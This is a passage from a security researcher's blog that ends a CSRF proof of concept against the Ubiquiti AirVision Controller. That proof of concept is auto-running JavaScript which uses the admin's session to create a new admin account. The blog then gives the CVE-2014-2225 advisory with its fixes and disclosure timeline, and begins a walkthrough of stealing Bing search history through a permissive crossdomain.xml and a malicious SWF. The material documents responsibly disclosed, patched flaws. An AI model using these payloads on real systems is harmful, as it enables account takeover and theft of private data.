    <span style="color: #888888;">// JSON body creating the user "csrf" in the admin group</span>
    <span style="color: #aa22ff; font-weight: bold;">var</span> post_data <span style="color: #666666;">=</span> <span style="color: #bb4444;">"{\"name\":\"csrf\",\"email\":\"csrf@gmail.com\",\"userGroup\":\"admin\",\"x_password\":\"password\",\"confirmPassword\":\"password\",\"disabled\":\"false\"}"</span>;
    <span style="color: #aa22ff; font-weight: bold;">var</span> xmlhttp <span style="color: #666666;">=</span> <span style="color: #aa22ff; font-weight: bold;">new</span> XMLHttpRequest();
    xmlhttp.open(<span style="color: #bb4444;">"POST"</span>, url_base, <span style="color: #aa22ff; font-weight: bold;">true</span>);
    xmlhttp.setRequestHeader(<span style="color: #bb4444;">"Accept"</span>, <span style="color: #bb4444;">"*/*"</span>);
    xmlhttp.setRequestHeader(<span style="color: #bb4444;">"Content-type"</span>, <span style="color: #bb4444;">"application/plain; charset=UTF-8"</span>);
    <span style="color: #888888;">// withCredentials makes the browser attach the victim's existing session cookie</span>
    xmlhttp.withCredentials <span style="color: #666666;">=</span> <span style="color: #aa22ff; font-weight: bold;">true</span>;
    xmlhttp.send(post_data);
}
<span style="color: green; font-weight: bold;">&lt;/script&gt;</span>
<span style="color: green; font-weight: bold;">&lt;/head&gt;</span>
<span style="color: green; font-weight: bold;">&lt;body</span> <span style="color: #bb4444;">onload="sendCSRF()"</span><span style="color: green; font-weight: bold;">&gt;</span>
<span style="color: green; font-weight: bold;">&lt;h1&gt;</span>CSRF POC<span style="color: green; font-weight: bold;">&lt;/h1&gt;</span>
Sending CSRF Payload!!!
<span style="color: green; font-weight: bold;">&lt;/body&gt;</span>
<span style="color: green; font-weight: bold;">&lt;/html&gt;</span></pre>
</div>
<span style="font-family: Calibri; font-size: 15px; line-height: 1; white-space: pre-wrap;"><br /></span><span style="font-family: Calibri; font-size: 15px; line-height: 1; white-space: pre-wrap;"><br /></span><span style="font-family: Calibri; font-size: 15px; line-height: 1; white-space: pre-wrap;">Here is a proxy view from the perspective of the victim Admin</span></div>
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="font-family: Arial; font-size: 15px; list-style-type: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.0791; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; vertical-align: baseline; white-space: pre-wrap;">First the admin's browser goes to </span><a href="http://www.malicious-site.com/" style="text-decoration: none;"><span style="color: #0563c1; font-family: Calibri; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">www.malicious-site.com</span></a><span style="color: black; font-family: Calibri; vertical-align: baseline; white-space: pre-wrap;"> and pulls the attacker's CSRF payload page</span></div>
</li>
<li dir="ltr" style="font-family: Arial; font-size: 15px; list-style-type: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.0791; margin-bottom: 8pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; vertical-align: baseline; white-space: pre-wrap;">Then the admin’s browser loads the forged request that will add another admin on the AirVision Controller</span></div>
</li>
</ul>
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><img height="97" src="https://lh3.googleusercontent.com/wf3uonn4Z0HhC_AvWYK-U_1NFUrQdXDldgNEyIddNzPRF5SGWWLMjlFjPl302PZ-4I1NCuhtVKCuqkHzpbaPX9AX6zORfSbV1ovhYwqrpkcv1HxTVqUe5rLLQjdOgszlS6pKyyKRPvI" style="-webkit-transform: rotate(0rad); border: currentColor;" width="624" /></span></div>
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">The forged request is shown below. You can see that the Referer header is </span><a href="http://www.malicious-site.com/csrf-airvision4.html" style="text-decoration: none;"><span style="color: #0563c1; font-family: Calibri; font-size: 15px; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">www.malicious-site.com/csrf-airvision4.html</span></a><span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">, and not the AirVision Controller. However, the browser still attaches the admin's valid session cookie when it sends the request to the AirVision Controller (the Same Origin Policy limits what the attacker's page can read from the response, not whether the request is sent):</span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><img height="336" src="https://lh6.googleusercontent.com/XMcQZjeBHC76nT3F0pXyBVZ5fKAfag7Sc_BKkNXKuwH49biOMJqNfuLE88_sLeFrGIH561SLFiprHelJ0hZI0htXFtt-l2hDDpeNiM5gS8CDtQD--MrAyhBodfRkGXge4sfDAJSGnhk" style="-webkit-transform: rotate(0rad); border: currentColor;" width="624" /></span></div>
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">The response, showing the new admin was created successfully:</span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><img height="242" src="https://lh6.googleusercontent.com/3-YwJAR-FCLnB_4kwwcXTclG7ur2ZgxKlRhMn50eed8blyIRTTBUv149pMcUMG1TatTu0XxQwrRiCz8_QbSnO7tLSDj6sXg9NHYvS44PBwIa9FB9UTBLC7c9z01IxHfk0zyOzcm4PVo" style="-webkit-transform: rotate(0rad); border: currentColor;" width="624" /></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Settings >> System (After CSRF attack) – The attacker logging in with the new credentials</span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><img height="361" src="https://lh6.googleusercontent.com/vHDhNkNICfE31xqVJkLn9q0jXXjbtoWKt2vE6tZ5ihx1HLTzD32dvC4hQp8LyBlrPchMyAZPLOQLj_-chLYa4HqYRJEeBk9TZ1VUlvYjgK5cjkhJQwGbYs1uYn3l_zHlYFq0Tl-F0xU" style="-webkit-transform: rotate(0rad); border: currentColor;" width="624" /></span></div>
</div>
<div>
<br /></div>
<div dir="ltr" style="margin-left: 0pt;">
Additional details:</div>
<div dir="ltr" style="margin-left: 0pt;">
<br /></div>
<div dir="ltr" style="margin-left: 0pt;">
<span id="docs-internal-guid-86a880ed-6565-adef-32ea-45db0c27472c"></span><br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span id="docs-internal-guid-86a880ed-6565-adef-32ea-45db0c27472c"><span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">(CVE-2014-2225) - Ubiquiti Networks - Multiple products - Cross-site Request Forgery (CSRF)</span></span></div>
<span id="docs-internal-guid-86a880ed-6565-adef-32ea-45db0c27472c">
</span><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span id="docs-internal-guid-86a880ed-6565-adef-32ea-45db0c27472c"><span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">-----------</span></span></div>
<span id="docs-internal-guid-86a880ed-6565-adef-32ea-45db0c27472c">
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Vendor: </span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">-----------</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Ubiquiti Networks (http://www.ubnt.com/)</span></div>
<br /><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">-----------------------------------------</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Affected Products/Versions: </span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">-----------------------------------------</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">UniFi Controller v2.4.6</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">mFi Controller v2.0.15</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">AirVision Controller v2.1.3</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Note: Previous versions may be affected</span></div>
<br /><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">-----------------</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Description:</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">-----------------</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Title: Cross-site Request Forgery (CSRF)</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">CVE: CVE-2014-2225</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">CWE: CWE-352: </span><a href="http://cwe.mitre.org/data/definitions/352.html" style="text-decoration: none;"><span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">http://cwe.mitre.org/data/definitions/352.html</span></a></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Researcher: Seth Art - @sethsec</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Detailed writeup (includes screenshots): </span><a href="http://sethsec.blogspot.com/2014/07/cve-2014-2225.html" style="text-decoration: none;"><span style="background-color: white; color: #1155cc; font-family: Arial; font-size: 13px; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">http://sethsec.blogspot.com/2014/07/cve-2014-2225.html</span></a><span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> </span></div>
</span><br /></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">-------------</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Solution:</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">-------------</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">UniFi Controller - Upgrade to UniFi Controller v3.2.1 or greater</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">mFi Controller - Upgrade to mFi Controller v2.0.24 or greater</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">AirVision Controller - Upgrade to UniFi Video v3.0.1 or greater </span><span style="font-family: Arial; font-size: 13px; line-height: 14px; white-space: pre-wrap;">(Note: The application name changed from AirVision to UniFi Video)</span></div>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">-----------------------------</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Disclosure Timeline: </span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">-----------------------------</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-02-16: Notified Ubiquiti of vulnerabilities in UniFi and mFi products</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-02-17: Ubiquiti acknowledges and requests details</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-02-17: Report with POC sent to Ubiquiti</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-02-19: Asked Ubiquiti to confirm receipt of report</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-02-19: Ubiquiti confirms receipt of report and existence of the vulnerabilities</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-02-25: Notified Ubiquiti of CSRF vulnerability in AirVision product</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-02-19: Ubiquiti confirms receipt of AirVision report and existence of the vulnerability</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-02-28: </span><span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">CVE-2014-2225 assigned</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-03-12: Requested status update</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-03-27: Requested status update</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-04-07: Requested status update</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-04-09: Ubiquiti provides timeline for solution</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-04-18: UniFi Video 3.0.1 is released</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-05-30: Requested a status update on the remaining two products</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-06-12: Requested a status update on the remaining two products</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-06-12: mFi v2.0.24 and UniFi 3.2.1 are released</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-06-13: Set public disclosure date of 2014-07-24 and notified vendor</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-07-24: Public disclosure</span></div>
<div>
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<h1 dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 12pt;">Real world exploitation of a misconfigured crossdomain.xml - Bing.com</h1>
<div>Seth Art, 2014-07-17 (updated 2016-10-17)</div>
<br />
In my <a href="http://sethsec.blogspot.com/2014/03/exploiting-misconfigured-crossdomainxml.html" target="_blank">previous</a> <a href="http://sethsec.blogspot.com/2014/03/exploiting-insecure-crossdomain.html" target="_blank">two</a> posts, I explain the overly permissive crossdomain.xml vulnerability, show you how to create malicious SWF files from scratch, and show you how to use the malicious SWFs to exploit the vulnerability. <br />
<br />
As we all know, sometimes the best way to wrap your head around a vulnerability is to see it being exploited. Rather than continuing to talk about the vulnerability in theoretical terms, I can now start to share some specific examples.<br />
<div>
<br /></div>
<div>
Microsoft has closed out my MSRC case, so I can share how I was able to exploit the crossdomain.xml file at www.bing.com, and land on their <i><a href="http://technet.microsoft.com/en-us/security/cc308575#0414" target="_blank">Security Researcher Acknowledgements for Microsoft Online Services</a></i> page (a first for me).<br />
<br />
<b><u>Misuse Case - Gaining access to a Bing.com user's saved search history</u></b></div>
<div>
<br /></div>
<div>
<span style="color: blue;">If the victim user is authenticated with any live.com linked account (msn, outlook, etc), and they visit a malicious site, the owner of the malicious site can retrieve the victim user’s entire search history, including the sites they visited by way of the search engine. </span><i><span style="font-size: x-small;"> </span></i></div>
<div>
<br />
<b><u>The vulnerable configuration (fixed now):</u></b></div>
<div class="separator" style="clear: both; text-align: center;">
<span id="docs-internal-guid-18cb2e99-8a8e-6a84-30d0-5e7ab7afd6a0" style="margin-left: 1em; margin-right: 1em;"><img height="219" src="https://lh4.googleusercontent.com/ybEcADaHZMEIpfVlpd1BI2l81i1xIrzaMADMAC3cNNAboOUHXj8lwmjwjpB4JFAxXEvybg7wRDi9vKnps8qj1Di41nBGjnqSXBJHsNpyu0Ge6N-c89B_NHFwchqh0STU_sSQT63B8W0" style="-webkit-transform: rotate(0rad); border: currentColor;" width="533" /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="margin-left: 1em; margin-right: 1em;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: inherit; font-weight: bold; line-height: 1; text-decoration: underline; white-space: pre-wrap;">Proof of Concept</span></div>
<strong>Note:</strong> In the proof of concept, I show the attack from the perspective of the victim. <span style="color: blue;"> Unlike in a real exploitation, the "victim" is going through Burp to illustrate what is going on behind the scenes.</span> <br />
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: inherit; line-height: 1; white-space: pre-wrap;"><b>Prerequisite:</b> The victim is currently authenticated with msn.com, live.com, bing.com, etc. This is a screenshot of the victim logged in and viewing the information that we (the attacker) are going to steal. The victim does not need to be on this particular page for the attack to work.</span></div>
<div style="line-height: 1;">
</div>
<div class="separator" style="clear: both; line-height: 1; text-align: center;">
<a href="http://1.bp.blogspot.com/-SE9zoOOIOyU/U2FlXkID48I/AAAAAAAAAN0/KdQYH9YxNEY/s1600/2014-04-30+17_01_12-Bing+Search+History.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="507" src="https://1.bp.blogspot.com/-SE9zoOOIOyU/U2FlXkID48I/AAAAAAAAAN0/KdQYH9YxNEY/s1600/2014-04-30+17_01_12-Bing+Search+History.png" width="640" /></a></div>
<div style="line-height: 1;">
<span style="font-family: inherit;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></span></div>
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Step 1:</span><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> Attacker hosts a malicious SWF on his/her server, and socially engineers a victim to arrive at the attacker’s site. </span></span><br />
<span style="font-family: inherit;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></span></div>
<div dir="ltr" style="margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: inherit; font-style: normal; font-variant: normal; font-weight: bold; line-height: 1; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Step 2:</span><span style="background-color: transparent; vertical-align: baseline;"><span style="font-family: inherit;"><span style="line-height: 1; white-space: pre-wrap;"> The victim, while logged into msn.com, live.com, bing.com, etc., loads the malicious HTML page:</span></span></span></div>
<div class="separator" style="clear: both; text-align: left;">
<b style="font-weight: normal;"><span style="font-family: inherit;"><br /></span></b></div>
<div class="separator" style="clear: both; text-align: left;">
<span id="docs-internal-guid-18cb2e99-8ab7-98ab-852e-69a0e08ac2c2" style="margin-left: 1em; margin-right: 1em;"><img height="110" src="https://lh3.googleusercontent.com/Q9552FSSfatESjWXK9iGNgDE9einj9siOZ1QgxE2xwOUzRPD2jSRBebCmpaC55e9AE66EiaGRPDcahIZPEjv97_TtD0fwS2VJOBdPHwO0iIOziM8H1pq8PJpMDRt02FT_Q" style="-webkit-transform: rotate(0rad); border: currentColor;" width="597" /></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="font-family: inherit;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></span><br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b style="font-weight: normal;"><span style="font-family: inherit;"><br /></span></b></div>
<div class="separator" style="clear: both; text-align: left;">
As you can see, the POC HTML page just instructs the victim's browser to execute the SWF file. </div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: inherit; margin-left: 1em; margin-right: 1em;"><img height="312" src="https://lh4.googleusercontent.com/GrciJiySH4NGz9pW6tA1RMYvzzqx0gritX8S11Lz35vqFpa3z8bJloJz6PdqAZbb3PGms9Wgn8F1GFshdCHlGMUuComnhMPXw2miUDX_7il5Kr9cszWXLz8u3ZlVARicMkRfQAhcrN0" style="-webkit-transform: rotate(0rad); border: currentColor;" width="529" /><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: left;">
<b style="font-weight: normal;"><span style="font-family: inherit;"><br /></span></b></div>
<span style="font-family: inherit; font-weight: bold; line-height: 1; vertical-align: baseline; white-space: pre-wrap;">Step 3:</span><span style="font-family: inherit; line-height: 1; vertical-align: baseline; white-space: pre-wrap;"> The victim's browser downloads and loads the SWF.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: inherit; margin-left: 1em; margin-right: 1em;"><img height="407" src="https://lh5.googleusercontent.com/cwcfBvn51xb9S26daLLB0Fz18uE_Ol761sERzOxhBXQA2enIMfyfYO4nUlZTxJLXQfWBzUO4FJUiSPk0pDg5DfyXXR-S78m1eYwTufcnpw5dW_4GV6gYPRLVq-QdriGarGN22kgJ3aw" style="-webkit-transform: rotate(0rad); border: currentColor;" width="542" /><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: left;">
<b style="font-weight: normal;"><span style="font-family: inherit;"><br /></span></b></div>
<div dir="ltr" style="margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-family: inherit; font-style: normal; font-variant: normal; font-weight: bold; line-height: 1; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Step 4:</span><span style="background-color: transparent; font-family: inherit; font-style: normal; font-variant: normal; font-weight: normal; line-height: 1; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> The SWF, now loaded in the browser, makes a request to </span><span style="background-color: transparent; font-family: inherit; font-style: normal; font-variant: normal; font-weight: normal; line-height: 1; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;"><a href="https://www.bing.com/crossdomain.xml" style="text-decoration: none;">https://www.bing.com/crossdomain.xml</a></span><span style="background-color: transparent; vertical-align: baseline;"><span style="font-family: inherit;"><span style="line-height: 1; white-space: pre-wrap;">. This is where the vulnerability lies. If the crossdomain.xml file at www.bing.com is configured correctly, the Adobe Flash player won't let the SWF proceed. When the crossdomain.xml file is overly permissive, it tells the Flash player that the SWF is authorized to interact with the domain (www.bing.com), even though the SWF was served from the attacker's site. </span></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: inherit; margin-left: 1em; margin-right: 1em;"><img height="256" src="https://lh3.googleusercontent.com/IBWJFz2_fDh2-dicjN7qOMXNyXgQv24PWirrl9YpWRKilV9_WmXy5YilP74-6yI2MMcHeZpwtDv-WsO0fT8Z3wghD0sHJLclXUsgf-CqNRNXx1g3vDi4ShL591MFc9eIImgDS4-htqE" style="-webkit-transform: rotate(0rad); border: currentColor;" width="550" /><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: left;">
<b style="font-weight: normal;"><span style="font-family: inherit;"><br /></span></b></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: inherit; font-weight: bold; line-height: 1; vertical-align: baseline; white-space: pre-wrap;">Step 5:</span><span style="font-family: inherit; line-height: 1; vertical-align: baseline; white-space: pre-wrap;"> The SWF makes a request on behalf of the victim and retrieves the user’s search history from </span><a href="https://www.bing.com/profile/history" style="font-family: inherit; line-height: 1; text-decoration: none;"><span style="text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://www.bing.com/profile/history</span></a><span style="font-family: inherit; line-height: 1; vertical-align: baseline; white-space: pre-wrap;"> and </span><a href="https://www.bing.com/profile/history/more" style="font-family: inherit; line-height: 1; text-decoration: none;"><span style="text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://www.bing.com/profile/history/more</span></a><span style="font-family: inherit; line-height: 1; vertical-align: baseline; white-space: pre-wrap;">:</span></div>
<div class="separator" style="clear: both; text-align: left;">
<b style="font-weight: normal;"><span style="font-family: inherit;"><br /></span></b></div>
<div class="separator" style="clear: both; text-align: center;">
